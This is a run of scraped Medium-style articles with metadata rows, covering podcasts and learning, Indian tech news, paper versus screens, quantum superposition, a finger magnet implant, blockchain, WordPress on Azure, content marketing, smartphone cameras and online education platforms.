Something happened in the fifteenth century that changed our entire mental landscape: the printing press was invented.
The effects were enormous, but perhaps the biggest effect still isn’t fully understood: it changed how we perceived knowledge and it is attained. With the printing press, Marshall McLuhan pointed out, sight came to dominate our learning. We started to view learning as a solitary affair, one of “me and the book: subject-object.”
Prior to the printing press, we didn’t think of learning in that manner. The great Jesuit modern philosopher, Walter Ong, dedicated his doctoral dissertation to explaining how, prior to the printing press, thinking was understood as something that takes place in connection with talking: discourse and disputation. (See John Peterson, Pop Goes the Culture, 119.)
Walter Ong, Marshall McLuhan, and others have spent a lot of ink and analysis, explaining how the printing press’ emphasis on sight stilted and warped our development.
You can read their weighty works.
Or you can just notice the popularity of the Integrated Humanities Program, Russ Roberts, and The Joe Rogan Experience and realize that they’re popular for a reason: reliance on books alone starved us for a more integrated approach to learning, which the conversational podcasts feed.
It’s Postmodern . . . ish
I’d also submit there is something vaguely postmodern about the conversational approach.
Jacques Derrida proved that words are simply not adequate to capture full reality. No word, in Derrida’s terminology, has “presentness”: No word perfectly captures an underlying reality. Words fit into a web where they have reference points to other words to tell us what they mean, but they have no underlying reality. To make it even more elusive, the web of words itself is constantly shifting, providing no fixed points.
Derrida concluded from this that there is no objective reality or truth. That’s absurd, but his fundamental insight isn’t: objective reality or truth can’t be capture by words. There’s always “more” than can be articulated.
The conversational approach better captures truth in this way. The participants bat words back and forth, like the web they exist in bats them back and forth, forcing them to constantly shift and refine their statements, like reality does. | https://medium.com/the-weekly-eudemon/listening-to-podcasts-at-oxford-in-1374-and-kansas-in-1974-956b5f5c9c5e | ['Eric Scheske'] | 2020-12-22 13:22:29.340000+00:00 | ['Technology', 'Knowledge', 'Learning', 'History', 'Ideas'] |
147 | IC Bytes of the Week: 06/12/20 | Welcome to IC Bytes, where we quickly sum up the hottest news of the week in tech and business — in layman terms that our young readers can easily understand.
⚡Top things that happened
Flipkart announces PhonePe spin-off, digital payments company to be valued at $5.5 billion
E-commerce giant Flipkart is doing a partial spin-off of PhonePe, India’s largest digital payments platform. The move will help PhonePe access dedicated, long-term capital to fund its growth ambitions including going public by 2023.
In this financing round, PhonePe is raising $700 million in primary capital at a post-money valuation of $5.5 billion from existing Flipkart investors including Tiger Global, led by Walmart, the world’s largest retailer, according to the industry sources. They said PhonePe’s pre-money valuation is $4.8 billion.
Source: TechStory
The fresh funding would come to PhonePe in two tranches of $350 million each and help PhonePe to compete with rivals such as Google Pay, Amazon Pay and Alibaba-backed Paytm.
2. Amazon India plans to use electric vehicles for last-mile delivery
Amazon is reportedly in talks with a clutch of electric vehicle (EV) manufacturers to procure customised electric vehicles for last-mile deliveries. It is in talks with both automobile giants and startups including Mahindra Electric, Kinetic Green, Bengaluru-based Altigreen, Hyderabad’s e-trio and Gayam Motor Works and Delhi-based EV aggregator SmartE. Kinetic is expected to start commercial deliveries of its electric rickshaws to Amazon delivery partners this month, with an initial order of 250–300 units.
While the talks with other EV manufacturers are still underway, these companies are reportedly are running pilots to showcase their products before scooping up larger orders. Beyond the big EV order, Amazon may also make strategic investments in some of these companies to align long-term interests in servicing its requirements. The e-commerce giant is looking for EVs that can carry a payload of about 500–600 Kg with a range of about 150 Km and a top speed of 50 Km per hour.
Amazon’s e-commerce rival Flipkart has committed to transition into a 100% EV fleet by 2030.
3. Oyo has $1 billion to fund operations until IPO, CEO tells employees
Ritesh Agarwal, founder and chief executive officer of Oyo Hotels, told employees the Indian startup is making progress in recovering from the coronavirus fallout and has about $1 billion to fund operations until an initial public offering.
The founder made the comments in a chat with Oyo board member Troy Alstead, after the once high-flying company endured months of layoffs and losses as Covid-19 hammered its business. Oyo is one of the largest startups in the portfolio of SoftBank Group Corp., reaching a valuation of $10 billion before the downturn.
Agarwal said the company’s focus is on getting revenue per available room to 60% to 80% of pre-pandemic levels across all markets. India, China, Japan and Southeast Asia are making progress in reaching that range, he added.
4. Indian SaaS firms set to rake in $18–20 billion revenues by 2022
SaaS (Software as a service) companies founded by Indian entrepreneurs are poised to reach USD 18–20 billion in revenue, with the potential to capture 7–9 per cent share of the global SaaS market by 2022, a report by Bain & Company said on Tuesday.
The ‘India SaaS Report 2020’, which analysed a wide range of Indian SaaS companies, said four key archetypes of Indian SaaS companies are expected to gain further traction.
This includes SMB-focused SaaS companies (like Zoho and Freshworks) that target global markets with easy-to-use horizontal offerings and vertical-specific SaaS companies (like Locus and Innovaccer) that are disrupting underserved verticals like healthcare and logistics.
Also, globally competitive companies in emerging tech (such as Postman and Hasura), and India initiators with products tailored for the domestic Indian market (Darwinbox, MyGate and Yellow Messenger) are expected to see strong growth.
5. Razorpay, PayPal come together to help MSMEs
Razorpay has partnered with global digital payments major PayPal to enable seamless international payments for Indian micro, small and medium-sized enterprises (MSMEs) and freelancers.
The company’s partner businesses can now integrate with PayPal and accept payments from international customers from across 200 markets conveniently and securely, reducing wait time from days down to minutes, Razorpay said.
Traditionally, micro-entrepreneurs have found it difficult to accept international payments on cards via payment gateways as many of them could not pass the eligibility checks at the banks’ end. By integrating PayPal into Razorpay’s payment platform, freelancers and MSMEs will now be able to accept international payments without having to write a single line of code, Razorpay said.
6. Artificial intelligence alone can add $500 billion to the economy: Google India
Google India on Thursday said artificial intelligence alone can add USD 500 billion to the economy, and assist in the better forecast of floods and accurate diagnosis of diseases.
The company has committed USD 10 billion for expanding India’’s digital footprint, a top official said.
Source: The Economic Times
Google had recently picked up a 7.73 per cent stake in Reliance Industries Ltd’’s (RIL) digital subsidiary, Jio Platforms Ltd. The two companies have also announced plans to come up with “an entry-level affordable smartphone”.
7. Funding: Cred raises $80M in Series B funding as valuation almost doubles, MobiKwik raises funding of INR 52 crore, Eightfold AI raises $125M
CRED, an app that helps you pay and manage your credit card bills, has raised $80 million. The round was led by DST Global and also saw participation from existing investors Sequoia Capital and Ribbit Capital.
With the Series C round of funding, the Kunal Shah-led startup’s value has almost doubled to $800 million — from its valuation of $450 million a year ago. This brings the just two-year-old startup closer to being a unicorn (with a valuation of over a billion dollars). It raised funds twice in 2019 alone — $125 million series A round and $120 million series B funding from Sequoia, Ribbit Capital, and more.
Fintech platform MobiKwik on Friday announced that it has raised INR 52 crore in a fresh round of funding that was led by Hindustan Media Ventures with the participation from Infosys co-founder Kris Gopalakrishnan’s family office Pratithi.
MobiKwik will use the fresh capital for growth in all key business segments of the firm, i.e. in digital credit and cards, consumer payments and payment gateway.
Talent intelligence platform Eightfold AI said that it has raised USD 125 million in its latest funding round, valuing the Noida-based company at USD 1 billion. The Series D round was led by General Catalyst, and existing investors such as Capital One Ventures, Foundation Capital, IVP and Lightspeed Venture Partners, the company said.
So far, the AI-powered talent intelligence platform that uses a single solution to manage the entire talent lifecycle, has raised more than USD 180 million. Eightfold has more than quadrupled its sales since the last round of equity funding in April 2019 and boasts of a customers base that includes Tata Communications, AirAsia, Bayer, Capital One and Micron. | https://medium.com/internclick/ic-bytes-of-the-week-06-12-20-57e1a4927c12 | ['Team Internclick'] | 2020-12-12 07:33:22.761000+00:00 | ['Ic Bytes', 'Amazon', 'Business', 'Funding', 'Technology'] |
148 | Will we ever replace paper? | Will we ever replace paper?
Why physical experiences are fighting back against the future of screens
I have some sort of a feeling that paper could never be replaced. I mean, despite our best efforts paper has already been replaced across industries over the last decade in an effort to make everything electronic — from the data we store to the way we communicate — digital connectivity has vastly improved every inch of business. It just would never make sense for an organisation to operate intentionally on paper anymore.
Yet still, think of any task you could perform with paper and I guarantee there is a digital counterpart to it. Paper is no longer essential due to the technology available to us, yet it still exists with no sign of going anywhere. Before you think this argument becomes ridiculous, that it is all about paper, then let me assure you it’s not. It’s about the core experience paper offers us and why it could perhaps never be replaced — this is not only paper, it’s about how so many digital touch points are failing to address the needs they were designed for.
For the past five years, how we design services has been dictated and limited by the touch points that were available to us — the PC, mobile and analog touch points. Much emphasis was placed on creating experiences delivered through digital screens and as a result, people spent more time interacting via device than in person. — FJORD
Ok, so it may not feel like these digital touch points are failing us and who am I to say they are but there’s a strong sense that we are beginning to sub-consciously fight back against them. Think of think of the last “to-do” list you made, was it using paper, post its or something digital? Maybe your iPhone notes or Trello?
“The future of screens should be about blending physical and digital experiences”
For the majority of us I can comfortably say we used something analog like paper and there’s a stronger reason behind this than some may think. It can be easier, faster, more available at the time but those are only surface arguments that can also be used for digital touch points.
One of the main reasons we still use paper for To-do lists is the sensory experience it stimulates. The touch of the page, the link between your pen, hand and mind and the tactility of having your next goal in your hand. The action of writing or reading something physical has a much stronger sense of connection than say — a digitally typed note that may or may not send you a reminder 15 minutes before the task needs to be completed. This emotional stimuli, the dopamine it sends to your brain is something that has arguably not yet been recreated through digital To-do list services.
Paper is just one small example of this sub-conscious dissatisfaction with our digital touch points. Do I even need to mention the growing angst against our screen addiction, or our need to now separate core technology outside of one device. Where once the goal was to pack as much as possible into one screen we suddenly find ourselves wanting experiences that offer something more personal and meaningful. Surprisingly it seems to me that the next step is actually to unpack our screens of all of these solutions into separated (physically integrated) experiences.
The future of screens should be about blending physical and digital experiences, solutions that create more sensory experiences — even for the simplest of tasks such as To-do lists. We should no longer be using digital as a sole touchpoint but as an enabler for our physical touchpoint — take this next example as a reference.
Restaurants have started to offer apps to download before visiting so that users can order and pay without the table service. Yes Wetherspoons in the UK is a great champion of this particular service as it has targeted the needs of their consumers in the correct context but why are restaurants that are famed for their customer service also offering these apps? I can’t say I would visit a nice restaurant and be amused to find I had to download an app onto of my already full memory to order something with no personal recommendation or conversation — the context of a touchpoint like this just isn’t appropriate. Instead why aren’t these restaurants looking to build on their customer service by using digital services or technology to enhance it thus creating a more sensory and admirable experience. — starting with the paper menu perhaps??
Technology should inspire us to design services that enable a positive experience, the line between physical and digital touchpoint is one such area that will start to be addressed more and more but until then no, I do not think we will ever replace paper. | https://uxplanet.org/will-we-ever-replace-paper-1dccf12f295b | ['Jack Strachan'] | 2018-05-14 10:50:33.838000+00:00 | ['Innovation', 'Technology', 'Design', 'UX Design', 'UX'] |
149 | The Three Pillars of Quantum Computing | The Three Pillars of Quantum Computing
The fundamentals of understanding how a quantum computer works
Image by Gerd Altmann from Pixabay
Quantum computing is one of those topics that people find very interesting yet quite intimidating at the same time. When people hear — or read — that the core of quantum computing is quantum physics and quantum mechanics, they often get intimidated by the topic and steer away from it. I will not deny that some aspects of quantum computing are incredibly puzzling and hard to wrap your mind around. However, I believe that you can understand the basics and the overall ideas of quantum computing without overcomplicating things. That is what I will attempt to do in this article and some upcoming articles about various quantum computing-related topics.
In this article, we will talk about the three fundamentals of quantum computing: superposition, qubits, and entanglement. These three concepts are the building stones to understanding how quantum algorithms do their magic and how quantum computing has the potential to solve some of the problems classical computers have failed to solve.
Now, let’s tackle each of them in detail…
Superposition
By author using Canva
Superposition may be the most famous quantum mechanics term ever! I guarantee you have heard of it before, not directly perhaps, but as the infamous Schrodinger’s Cat. In case you never heard of the one and only cat, Schrodinger’s cat, is a thought experiment that explains the concept of quantum superposition. It goes like this: assume you have a cat and a sealed bottle of poison in a closed box together. The question now is, how would you know if the poison bottle broke open and the cat died or if the cat is still alive inside the box?
Since you can’t tell for sure if the cat is dead or alive without opening the box, the cat is now in a state of superposition, which simply means it’s a 50/50 chance of the cat being dead or alive. That’s it! In technical terms, superposition is a principle — much as in classical physics — that refers to when a physical system exists in two states at the same time. Superposition is not an absolute term; that is, it doesn’t mean anything by itself; it instead refers to a specific set of solutions. The set of solutions differs based on your application and what you’re trying to achieve. Nevertheless, the most commonly used set of solutions is ALL possible solutions, also known as Hilbert Space.
In the case of Schrodinger’s cat, the solution space (all possibles states of the cat) contains only two states; the cat is either dead or alive, there’s no other possibility. Hence the superposition of that solution space is that the cat is both dead and alive at the same time, or in other words, the cat is 50% dead and 50% alive. If we were to put that in an equation form it will look like this:
By author using Canva
This equation represents the mathematical form of the superposition of both states of the cat (dead and alive) with a 50/50 probability. The probability of any state equals the absolute value of the square of the amplitude. In our cat equation, both states have the same amplitude of 1/√2. Which if we calculated the absolute square of will gives us 1/2, or 50%. We also notice that the 2 under the square root also represents the size of the Hilbert space.
So, our cat state remains a mystery, that is until we finally open the box. Once we do that, the superposition will collapse, and the cat will be either 100% dead or 100% alive. | https://medium.com/digital-diplomacy/the-three-pillars-of-quantum-computing-d80ff5f50ec7 | ['Sara A. Metwalli'] | 2020-09-22 15:25:04.277000+00:00 | ['Quantum Computing', 'Quantum Physics', 'Demystifying Technology', 'Technology', 'Science'] |
150 | Biohacking my First Steps into Transhumanism. | the Operation.
The procedure was simple. My hand was cleaned and massaged, and eventually, a needle was inserted into my finger. No anaesthetic was used. This needle created the initial incision. Eventually, a second needle was inserted, to enlarge the incision and create a pocket where the magnet would sit. This portion of the procedure was incredibly painful. The sensations got progressively worse as a magnet was injected into the large pocket that now existed within my finger. The insertion of the magnet was a particularly intense sensation.
A second magnet was used to drag the inserted magnet deep into the pocket. I was able to feel the magnet ripple over the nerves inside my hand. Once this was done, the blood was cleaned off and a bandage placed on my finger. It was left to heal with the recommendation to clean it twice a day with salt water. Before bed, I removed the bandage to allow for the wound to develop a scab in the presence of my own bacteria. For the rest of the day, no sensation could be felt other than mild pain.
Healing Process
it Took about 2 days before I was able to Feel any magnetic Field this was my laptop charger I felt a slight Buzzing although During the First 2 weeks I was advised not to use my left hand in Close Proximity to any magnetic Object as its important that the nerves reform and Grow around the Implant.
what does it do?
if I enter in to an area with a high magnetic Field I’am able to detect it.
if it's a microwave or a motor it's the smallest Buzzing sanitation, or if I'm close to a hard drive I feel it click and tick. and in High Power cables I’am able to Feel the small buzz surround them.
Conclusion.
the ability to sense magnetic fields has become greater as far as my understanding goes, as I’m now able to detect vibrations from phone speakers, microwaves, and much more. The magnet isn’t getting in the way of everyday life, although something to be aware of is that if you were to attempt to do pull-ups it would be quite difficult. The same would go for heavy lifting. Luckily my magnet crept to the left side of my finger. This has allowed for the pad of the finger to be a majority clear, meaning I’m able to lift and carry things with great ease, although when I do, the sensitivity to vibrations from the magnet is reduced. In my opinion, this is worth it, as I maintain more functions.
The ability to detect magnetic fields is an incredible feeling that can only be described as a tiny vibrating sensation within the finger. Laptop chargers, motors, and other things have this field, and it has allowed me to detect where household appliances are wasting energy.
For example, being able to detect and feel a magnetic field coming from my flatmate's Microwave clock about 7 inches (ca. 18 cm) away leads me to conclude that there is a large amount of waste energy being used. | https://medium.com/@owenharriman7/biohacking-my-first-steps-into-transhumanism-2f193790b4bd | ['Owen Harriman'] | 2020-12-28 19:14:16.911000+00:00 | ['Biotechnology', 'Magnetic', 'Technology', 'Medicine', 'Transhumanism'] |
151 | How Blockchain Technology Can Change Our Lives? | Technology has always changed human lives in many ways. In ancient times, some fundamental innovations could help humans fight with dangers that the natural world persistently gave rise to them. For example, imagine the time that humans started to use military equipment. For sure that equipment was simple, but during time they went through the procedure of evolution and development. Blockchain technology is the kind of innovation that has commenced a shift from the traditional approach of discovering nature’s potentials to a more noble one.
Blockchain Technology Is a Decentralized Ledger That Distributes the Information Throughout All Possible Nodes.
Simply put, Blockchain technology is a decentralized ledger that distributes the information throughout all possible nodes. But this definition might be rather technical and hard to grasp. We better think about how traditional banking works in order to have a deeper knowledge of how Blockchain works primarily in modern finance.
Traditionally said, banks are centralized establishments that store a huge amount of private information. Therefore, banks always have this power to control the way citizens behave specifically when it comes to the financial issues. Banks on the other hand have a kind of monopolized right to issue bonds and other facilities without the permission of account holders. In a broad sense, traditional banking is a concept that prevails injustice. This is not uncommon to say that there are still millions and surprisingly billions of people out there who do not have any access to bank facilities.
When it comes to traditional banking, only few people have their interests secured, but many of them are pushed to the corner or ignored. Blockchain technology has been invented to provide financial inclusion, although it must be said that Blockchain nowadays is employed in many fields such as supply chain, voting mechanisms, real estate processing, personal identity security and so many other fields.
Blockchain Removes Third Party Supervision
In traditional banking, the government authorities or centralized agencies control account holders’ private data and if they please they can modify the policies to gain more profit. But with the advent of Blockchain technology, the power has been delegated to people who are engaged in financial activity. Therefore, all the possible traders in the Blockchain territory can see and confirm the data that are stored constantly in the blocks.
With The Help of Smart Contracts, Everything Becomes Simpler
One of noble features of Blockchain technology is smart contracts. These contracts pave the road for the autonomous implementation of transactions. Therefore, we can expect that with the help of smart contracts not only there would be no need for heavy piles of legal papers, but also a considerable amount of time can be saved instead of spending it on unimportant tasks.
With the help of smart contracts, Blockchain automates the manual and time consuming tasks which traditionally require a substantial amount of work.
Blockchain Implementation in Supply Chain and Its Implication
Foods and goods are produced and distributed in a hugely complex network in which many actors such as producers, distributors, consumers, and transporters play significant roles. In the traditional manual paperwork, there might occur different errors and disparities between institutions which are involved in the process of supply chain.
Blockchain technology can improve the process of distributing goods via providing the trade centers with advanced infrastructure for certifying and tracking the goods. For automatic payments in the supply chain, smart contracts can also be implemented.
Blockchain Technology Can Solve the Election Disputes
Political elections have always ignited disputes among parties, specifically we have witnessed that the losing party avoids to concede the results and try to accuse the other party of rigging votes and stealing the election. Therefore, how would it be possible to provide a comprehensive solution for such occasions? The implementation of Blockchain technology in the process of collecting and counting the votes can significantly protect democracy from the threats that endanger the sovereignty of freedom in the modern world.
Blockchain technology, via providing a secure and decentralized platform, will never allow prefabricated structures nor any party which enjoys the dominance in the system to confiscate the election results as desired.
Conclusion
It has not been a long time since the advent of Blockchain technology, but in this period of a decade long, this technology has been able to change the world as we always used to perceive, but in an entirely different manner. Blockchain technology, although is the fundamental concept of cryptocurrencies, but its application is not limited to just financial issues. We can nowadays trace back the use cases of Blockchain technology in a wide range of areas such as higher education, smart identity confirmation, KYC protocols, and so on. It has been predicted that in near future, all businesses and trade centers be obliged to use some forms of Blockchain technology just to keep themselves adjusted to the dramatic changes of postmodern era. | https://medium.com/@counosplatform/how-blockchain-technology-can-change-our-lives-74ff81a18ce2 | [] | 2020-12-11 18:16:35.973000+00:00 | ['Smart Contracts', 'Blockchain', 'Blockchain Technology', 'Third Party', 'Election 2020'] |
152 | Installing WordPress on an Azure App Service | Click on the Create button to proceed to the next screen where you’ll enter all the details.
We’ll give it a suitable App name. This app name will also become our website URL, so choose wisely! Next, select the Azure Subscription you want this resource to be charged to. Immediately after that, we’ll select the Resource Group — this allows us to logically organise our resources.
From the Database Provider dropdown, we’ll select MySQL In App. There are a few other options in there — all of which are just different ways you can create the database for this WordPress site.
MySQL In App runs a local MySQL instance with your app and shares resources from the App Service plan. There is no extra cost for this database. You cannot access the database using external tools like Workbench or MySQL CLI. Apps using MySQL In App are not intended for production environments, and they will not scale beyond a single instance. Read more about the limitations in this official blog post.
Now, let’s select App Service plan/Location to choose either an existing App Service plan or create a new one. This decides how much you’ll be paying for the App Service itself. If you’re following along, you can select a free tier as well.
Finally, select Application Insights and enable it so you can configure an Application Insights resource or disable it if you don’t require Application Insights right now. Don’t worry, you can always connect your App Service with an Application Insights resource later should you change your mind.
After entering all the details, click on Create. This will spin up your resources and in a few moments, you would be able to access it in the Azure portal.
Fun fact: In the background, Azure pulls all the required WordPress files from this GitHub repository.
Now, head over to the App Service you just created and click on Browse so you can head over to the website in a different browser tab. Note the URL — it contains your App Service name.
The first thing you would see is the WordPress installation page. Let’s start by selecting the language and then click on Continue.
Then in the installation page, enter your site information. Securely store the username and password as that would be the admin’s credentials for the site. You can then log in using these credentials and create accounts for your team if required.
Click on the Install WordPress button to begin the famous 5-minute WordPress installation.
Click on the Log In button to head over to the login screen.
Enter your username and password and then click on Log In to head over to your WordPress dashboard. It should look something like the following screenshot. Hooray!
Accessing MySQL via phpMyAdmin
For those who have used MySQL in the past, you would be hoping to see the phpMyAdmin portal to manage your database. In this scenario, search for and select MySQL In App option from the left menu list and then select Manage from the screen that opens.
phpMyAdmin comes installed and Azure should automatically take care of the login for you and redirect you to the phpMyAdmin portal.
Have fun customizing your WordPress website. Feel free to leave a link of your website in the comments and I’d love to check it out.
That’s it. Thanks for reading! | https://medium.com/@clydedz/installing-wordpress-on-an-azure-app-service-77dc2cf696d8 | ["Clyde D'Souza"] | 2020-12-16 05:26:28.750000+00:00 | ['How To', 'Technology', 'Website Design', 'WordPress', 'Azure'] |
153 | What is Content Marketing? | How is content marketing different from traditional advertising?
What most people find difficult to understand about content marketing is how it differs from traditional advertising. After all, if “content is king,” what have companies been marketing with all these years?
Traditional advertising is interruptive and allows marketers to push out their message in front of their audience — regardless of whether or not they want to see it. Traditional advertising rushes at consumers in the form of newspaper ads, magazine ads, billboards, radio ads, television ads, and direct mailings.
On the other hand, content marketing is much more subtle. This marketing is entertaining and educational. It draws in customers through storytelling, articles, blog posts, newsletters, emails, quizzes, infographics, videos, and podcasts. Content marketing offers consumers value and thereby makes them appreciate your company’s existence. You’re not advertising directly to your customers. You’re offering them something in your marketing that helps them feel connected to your brand.
Content marketing also excels through avenues like a company or outside blog, social media sites, YouTube, and online articles. These formats have only become more available in the past two decades, and companies are taking advantage of them.
There are a few other ways that you may distinguish content marketing from traditional advertising:
Short-term v. Long-term
Traditional advertising operated on the idea that a customer would see the ad and be enticed to buy the product immediately. But…who actually does this? Conversely, content marketing doesn’t worry about selling a product each and every time they get in front of their customer. Companies who focus on this strategy know that the best way to their customers’ wallets is by providing valuable content.
Talking to v. Talking with
Traditional advertising talks to customers. There’s no dialogue or relationship. It’s just a litany of benefits of a product or service. Content marketing, especially on social media, allows customers to respond, engage, interact, and get involved. You can gauge interest in certain topics or ask for feedback on new ideas. It allows you to cater your marketing and campaigns to your audience instead of telling them what you think they want you to hear.
Showing v. Nurturing
A great example of traditional advertising is a car dealership commercial. Within seconds, you know all about the business and product that is being sold to you. The person on the screen is talking at you, telling you what you could have, and showing you the price tag for it.
Content marketing is the opposite. It’s a slower process, and it targets customers who have an interest in your industry. By producing content that they find useful or interesting, you create and nurture a relationship with them. You provide value and keep them coming back.
General v. Targeted
Traditional advertising is about getting your message in front of as many people as possible. Content marketing targets a specific group of individuals. Before putting out a content marketing campaign, businesses will research that specific audience and look at trends that do well among that group. The more they know about them, the greater chance they have of boosting engagement, getting new sales, developing customer loyalty, and more! | https://medium.com/digital-marketing-lab/what-is-content-marketing-1a910111d6c1 | ['Casey Botticello'] | 2020-12-19 00:01:54.477000+00:00 | ['Entrepreneurship', 'Technology', 'Social Media', 'Productivity', 'Writing'] |
154 | 200 universities just launched 560 free online courses. Here’s the full list. | In the past three month alone, more than 200 universities have announced 560 such free online courses. I’ve compiled this list below and categorized the courses into the following subjects: Computer Science, Mathematics, Programming, Data Science, Humanities, Social Sciences, Education & Teaching, Health & Medicine, Business, Personal Development, Engineering, Art & Design, and finally Science.
If you have trouble figuring out how to signup for Coursera courses for free, don’t worry — I’ve written an article on how to do that, too.
Here’s the full list of new free online courses. Most of these are completely self-paced, so you can start taking them at your convenience.
COMPUTER SCIENCE
MATHEMATICS
PROGRAMMING
DATA SCIENCE
HUMANITIES
SOCIAL SCIENCES
EDUCATION & TEACHING
HEALTH & MEDICINE
ENGINEERING
ART & DESIGN
BUSINESS
PERSONAL DEVELOPMENT
SCIENCE | https://medium.com/free-code-camp/200-universities-just-launched-560-free-online-courses-heres-the-full-list-d9dd13600b04 | ['Dhawal Shah'] | 2019-03-20 02:07:28.152000+00:00 | ['Programming', 'Startup', 'Self Improvement', 'Technology', 'Education'] |
155 | Multiple Cameras in a Smartphone. Do you really need them? | Nowadays, almost every smartphone comes with at least three cameras baked right into it. It includes two rear cameras and one front-facing camera. The mid-range segment smartphone camera system may comprise up to 5 cameras (including front-facing camera). But, do these numbers really matter? What’s the purpose of numerous cameras? And, where it all started?
The Beginning
In 2011, LG Optimus 3D and HTC Evo 3D featured 5 Megapixel dual rear cameras which were meant to make your photos look real by adding depth to them. At that time, new 3D technologies were becoming popular in the world of cinema and the smartphone manufacturers decided to roll the dice by experimenting with a camera system which boasted a 3D experience but apparently, it proved to be a foundational step in the smartphone industry which is heavily adopted by everyone nowadays.
A typical smartphone nowadays may consist of a main/primary camera, a depth-sensing camera, a wide-angle camera, a macro-camera and probably a telephoto lens or a time of flight sensor depending on the budget of your smartphone. Okay, so what do they do?
Primary Camera
The primary camera of your smartphone is the default camera which is used more often than any other camera. It has the highest resolution, more megapixel count and probably image stabilization baked into it.
The primary camera consists of a lens with fixed focal length and an image sensor which you can say is the heart of the camera. The bigger the image sensor, the higher the image quality. High megapixel count doesn’t always mean better image quality. It depends on the size of the sensor as well as the quality of the sensor. There are a lot of other factors which affect the image quality, which we will talk about in a minute.
The primary camera has a standard focal length ranging from 24mm to 28mm. The camera lenses which have low focal lengths can capture a wider area like a landscape. As the focal length increases the field of view generally decreases.
One thing to note here is that the focal lengths mentioned here are not actual focal lengths of a smartphone camera lens.
In the world of smartphone photography, whenever you see a focal length of let’s say 26mm, that would be the focal length of a professional camera lens if it were to produce an image equivalent to the image captured by the smartphone from a particular angle.
Source: Realme
Depth-sensing Camera
As the name suggests, a depth sensor usually gathers information about the foreground and background of an image and uses that information to blur the background from the foreground of an image.
Why are they not used more often nowadays? Well, because most of the job is done by ‘software’ itself.
Wide-Angle Camera
The focal length of a wide angle lens in a wide angle camera is around 22–25mm which is less than the primary lens. A short focal length means a large field of view.
The purpose of this camera is to usually take landscape photographs or in smartphone terminology, wide angle photographs.
Normally they perform well but the overall image quality is slightly less than the primary camera.
Telephoto Camera
Telephoto camera has a different type of lens whose focal length is pretty long which eventually leads to a shorter field of view. What this means is that if you have an object far far away, you can capture the details of that object by using a telephoto lens.
In simple terms, it is used for zooming in an object without the help of digital zoom.
Nowadays, smartphone manufacturers use something known as ‘hybrid zoom’ which combines the image from a telephoto lens and further applies a digital zoom to zoom into an object even farther.
Macro Camera
A macro camera is generally used to capture tiny objects and minute details. The megapixel count of macro cameras in smartphones is usually low.
LiDAR Camera
You might have heard of a LiDAR sensor in the latest iPhone model but what’s the use of such a type of sensor? Well, the reason is quite interesting.
LiDAR (Light Detection and Ranging) is a technique in which the camera will fire pulses of infrared light on an object and will measure the time taken by the light to reflect from the object back to the camera sensor. In doing so, the distance of the object from the camera sensor can be calculated.
Also, by firing pulses of infrared light on multiple objects in a scene, the relative distance between those objects can be calculated which can be further used to know the depth information of those objects.
By doing so, you can blur the objects in the background from the objects in the foreground much more precisely and accurately rather than just guessing and approximating the whole thing.
LiDAR sensors can also be used for improving Augmented Reality in smartphones.
The availability of extra space in a smartphone is a big concern. You can’t have a lens which can change its focal length as per your requirement just like a DSLR camera. That’s why multiple lenses of different focal lengths are used to allow people to take shots from different angles.
We are in the era of smartphone photography. Nearly everyone has a smartphone and the ability to take decent photos from a smartphone itself without tweaking settings like focal length, aperture, ISO, shutter speed etc. is a huge deal for many people.
Do You Really Need Them?
Smartphone Photography
It depends. If you don’t have a DSLR and you want to explore photography in general then multiple cameras can be good for you because it will allow you to explore different angles and perspectives. Or, if you are a kind of person who just want to take decent photos and selfies, then a decent single or at the most a dual camera system would be more than sufficient for you. As far as image quality is concerned, it depends on the camera sensor and the software of the smartphone manufacturer. More megapixels don’t mean better image quality.
A 12 Megapixel DSLR can produce better image quality than a 20 Megapixel smartphone camera because of the size of the camera sensor. The larger the surface area, the greater amount of light captured by the sensor.
Google, in their Pixel smartphone used some advanced computational photography techniques to deliver some of the best photographs which could be ever taken from a single 12 MP smartphone camera.
So, it’s not a hard and fast rule to have multiple cameras in a smartphone. The advancement of smartphone photography may depend on Moore’s Law. Wait, what’s Moore’s Law? Well, let’s keep that for another blog post.
That’s all for now. Signing off.
If you have any suggestions, then you can send us a message by going to Contact tab or leave us a comment below.. | https://medium.com/@techthatthrills/multiple-cameras-in-a-smartphone-do-you-really-need-them-200bc420345a | [] | 2020-12-15 17:05:07.112000+00:00 | ['Cameras', 'Smartphones', 'Mobile Photography', 'Augmented Reality', 'Technology'] |
156 | 10 Must-Have Features of an Online Education Platform | Kitaboo | An online education platform is meant for delivery of educational content to students. The platform, unlike a textbook is an interactive medium where students can engage with the content. And therefore, these platforms are in high demand in schools and universities across the globe. Because every institute wants their students to understand the concepts and its implications in the real world. KITABOO Nov 15, 2019·3 min read
This high demand has resulted in the production and availability of many such online education platforms in the market, putting educational institutions in a dilemma. How do they decide which platform works best for their students? Every vendor claims to have the best learning platform which benefits students and teachers. They all have multiple features are more or less similar to one another.
What then, is the differentiating factor which you should look for while selecting an online learning platform?
Here in this blog, we will highlight some of the features that must be present in a learning platform. Having a concise list will help you determine and compare among multiple tools and make the right choice for your students.
Also read:How Can eTextbooks Help K-12 Publishers, Institutes & Students
So, here are the must-have features of an online education platform.
1. Easy-to-use interface
First of all, we need an interface that is easy to use. The icons and text should be clear and legible. Teachers and students must be able to navigate through the app smoothly. A lot of teachers are still getting used to the idea of using eBooks and online content delivery platforms in classrooms.
As instructors are required to design courseware, they must be comfortable in using the platform efficiently. The tool should be designed in such a way that someone who does not know coding must be able to use and operate it without difficulty. As for students, they will appreciate a platform which allows them to navigate easily and functions smoothly.
2. Custom Branding
An institution would want a platform which offers a touch of personalization. Just like all the learning resources provided by an institute has their logo over it, similarly, the learning platform must also incorporate their brand image/logo and color palette.
It will give the students a sense of belonging, rather than using a third-party tool. Therefore, you must look for a vendor who can provide a white-label platform, which you can customize as per your liking.
3. Offline Reading
Though it’s an online education platform, it must also be accessible offline. Students might want to download some content and read later. And in case there’s no internet connectivity, students should not be deprived of the chance to study. So, there must be an option for users to download content and read it offline.
4. Cloud-hosted Platform
Ensure that it is a cloud-based platform. Meaning, all the data is saved on the cloud. With a cloud-based tool, you can be assured that your content is always accessible from anywhere and anytime. Moreover, it can be updated as and when required, and the changes would be reflected in all students’ eBooks.
5. Interactive Elements
You should be able to add interactive elements to the platform. Online interactivities include quizzes, audio files, videos, simulations, gamification etc. The tool must also allow students to make notes and share with their peers or teachers, bookmark pages, search for information, highlight texts, etc. Including interactive elements increases student engagement with the courseware. Hence, look for all the interactivities that the platform offers.
